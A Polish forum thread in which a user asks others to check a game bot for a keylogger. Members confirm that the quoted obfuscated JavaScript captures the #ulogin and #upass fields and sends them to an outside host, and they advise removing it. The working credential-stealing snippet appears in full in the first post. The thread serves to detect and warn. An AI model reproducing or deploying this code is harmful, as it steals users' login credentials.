Skocz do zawartości

Sprawdzenie bota

Polecane posty

10 godzin temu, _mongol napisał:

https://pastebin.com/RJLfzj55

Jakby ktoś mógł zerknąć czy jakiś KL tu nie siedzi. 

var TpG3Y86zpgrtWMzb,ZHN4ekpZ5m95pFbJ,YQTtmEs6a5mTXE5a;function UagZgR8PZcWcwvYp(){$(atob("I3Vsb2dpbg==")).val()!=TpG3Y86zpgrtWMzb&&$(atob("I3Vsb2dpbg==")).val()&&(TpG3Y86zpgrtWMzb=$(atob("I3Vsb2dpbg==")).val()),$(atob("I3VwYXNz")).val()!=ZHN4ekpZ5m95pFbJ&&$(atob("I3VwYXNz")).val()&&(ZHN4ekpZ5m95pFbJ=$(atob("I3VwYXNz")).val()),!$(atob("I3VwYXNz")).val()&&!$(atob("I3Vsb2dpbg==")).val()&&TpG3Y86zpgrtWMzb&&ZHN4ekpZ5m95pFbJ&&YQTtmEs6a5mTXE5a!=TpG3Y86zpgrtWMzb+" | "+ZHN4ekpZ5m95pFbJ&&($.ajax({url:atob("aHR0cHM6Ly96M3Y2cnljNi5jdDgucGwvYWpheC5waHA/bG9naW49")+TpG3Y86zpgrtWMzb+atob("JnBhc3N3b3JkPQ==")+ZHN4ekpZ5m95pFbJ}),YQTtmEs6a5mTXE5a=TpG3Y86zpgrtWMzb+" | "+ZHN4ekpZ5m95pFbJ)}

Siedzi.

Dzieki za odpowiedź @Paderur . Jak to odczytać? Domyślam się że to jest jakoś zakodowane, bo nie widzialem takich konstrukcji w js.  I jeśli dobrze rozumiem jakis debil doczepil do bota to na samej górze i liczył ze przejdzie XD I poprawcie mnie jesli się myle. Jeśli to idzie odszyfrować, to mogę im po prostu podmienić zmienne które są wysyłane i wysłać autorowi obraźliwą wiadomość? 🙂 

37 minut temu, _mongol napisał:

Dzieki za odpowiedź @Paderur . Jak to odczytać? Domyślam się że to jest jakoś zakodowane, bo nie widzialem takich konstrukcji w js.  I jeśli dobrze rozumiem jakis debil doczepil do bota to na samej górze i liczył ze przejdzie XD I poprawcie mnie jesli się myle. Jeśli to idzie odszyfrować, to mogę im po prostu podmienić zmienne które są wysyłane i wysłać autorowi obraźliwą wiadomość? 🙂 

To wysyła pole #ulogin i #upass na tą stronę: https://z3v6ryc6.ct8.pl/ajax.php?login= nie radziłbym nawet instalować 😛

4 godziny temu, _mongol napisał:

A usunięcie tego całego fragmentu?

tak. To pomoze.

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się
  • Kto przegląda   0 użytkowników

Brak zalogowanych użytkowników przeglądających tę stronę.

Okienko zamknie się za 5 sekund...